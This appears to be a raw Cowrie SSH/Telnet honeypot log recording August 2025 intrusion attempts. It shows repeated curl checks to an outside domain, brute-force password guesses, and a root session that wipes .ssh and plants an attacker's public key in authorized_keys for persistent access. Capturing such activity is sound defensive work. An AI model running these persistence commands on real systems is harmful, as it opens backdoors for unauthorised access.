{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:32.165211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:32.899624Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:32.900986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:33.155601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:33.156599Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:37.363657Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:37.364698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:45.353676Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:45.354794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:50.253882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:50.254880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55462,"dst_ip":"1.2.3.4","dst_port":22,"session":"dea6fe72c029","protocol":"ssh","message":"New connection: 217.72.205.35:55462 (1.2.3.4:22) [session: dea6fe72c029]","sensor":"my-vps","timestamp":"2025-08-28T07:42:54.993145Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:42:54.994107Z","src_ip":"217.72.205.35","session":"dea6fe72c029"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:55.687972Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:55.688986Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:00.897290Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:00.898403Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:04.965234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:04.966135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:09.932951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:09.933801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:12.021804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:12.022690Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:14.413427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:14.414228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:19.106965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:19.107838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:24.379911Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:24.380857Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:27.071081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:27.072094Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":47497,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cecc494a426","protocol":"ssh","message":"New connection: 213.6.203.226:47497 (1.2.3.4:22) [session: 9cecc494a426]","sensor":"my-vps","timestamp":"2025-08-28T07:43:28.164346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:43:28.165133Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:43:28.247277Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin1@123","message":"login attempt [root/Admin1@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:43:28.623019Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:29.003731Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.004425Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.005659Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.089950Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:29.276807Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.277573Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.361867Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.362764Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:29.385764Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.386618Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":61630,"dst_ip":"1.2.3.4","dst_port":22,"session":"92cbc1a2eedf","protocol":"ssh","message":"New connection: 213.6.203.226:61630 (1.2.3.4:22) [session: 92cbc1a2eedf]","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.428831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.429919Z","src_ip":"213.6.203.226","session":"92cbc1a2eedf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.498403Z","src_ip":"213.6.203.226","session":"92cbc1a2eedf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T07:43:29.812077Z","src_ip":"213.6.203.226","session":"92cbc1a2eedf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:43:30.881423Z","src_ip":"213.6.203.226","session":"92cbc1a2eedf"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":47485,"dst_ip":"1.2.3.4","dst_port":22,"session":"f327281cac44","protocol":"ssh","message":"New connection: 213.6.203.226:47485 (1.2.3.4:22) [session: f327281cac44]","sensor":"my-vps","timestamp":"2025-08-28T07:43:30.948246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:43:30.949493Z","src_ip":"213.6.203.226","session":"f327281cac44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:43:31.017265Z","src_ip":"213.6.203.226","session":"f327281cac44"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:43:31.329103Z","src_ip":"213.6.203.226","session":"f327281cac44"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:43:31.399371Z","src_ip":"213.6.203.226","session":"f327281cac44"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:43:31.400385Z","src_ip":"213.6.203.226","session":"9cecc494a426"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:32.027142Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:32.027979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49477,"dst_ip":"1.2.3.4","dst_port":23,"session":"1464eea6c7a5","protocol":"telnet","message":"New connection: 212.227.235.229:49477 (1.2.3.4:23) [session: 1464eea6c7a5]","sensor":"my-vps","timestamp":"2025-08-28T07:43:35.952361Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:36.915841Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:36.916604Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:39.565831Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:39.566859Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:41.961132Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:41.961982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63165,"dst_ip":"1.2.3.4","dst_port":22,"session":"80a51c6de055","protocol":"ssh","message":"New connection: 212.227.125.160:63165 (1.2.3.4:22) [session: 80a51c6de055]","sensor":"my-vps","timestamp":"2025-08-28T07:43:42.295057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:43:42.295835Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:43:42.423312Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma","message":"login attempt [alma/alma] failed","sensor":"my-vps","timestamp":"2025-08-28T07:43:43.004797Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:44.088799Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:44.089648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma1","message":"login attempt [alma/alma1] failed","sensor":"my-vps","timestamp":"2025-08-28T07:43:44.126983Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma123","message":"login attempt [alma/alma123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:43:45.225624Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:46.250679Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:46.251485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma1234","message":"login attempt [alma/alma1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:43:47.047416Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.login.failed","username":"alma","password":"alma12345","message":"login attempt [alma/alma12345] failed","sensor":"my-vps","timestamp":"2025-08-28T07:43:48.171757Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:48.520545Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:48.521328Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:43:49.286576Z","src_ip":"212.227.125.160","session":"80a51c6de055"}
{"eventid":"cowrie.session.closed","duration":13.446835994720459,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:43:49.399112Z","src_ip":"212.227.235.229","session":"1464eea6c7a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:51.053414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:51.054177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:53.722061Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:53.722993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:56.151822Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:43:56.152607Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:43:58.413625Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
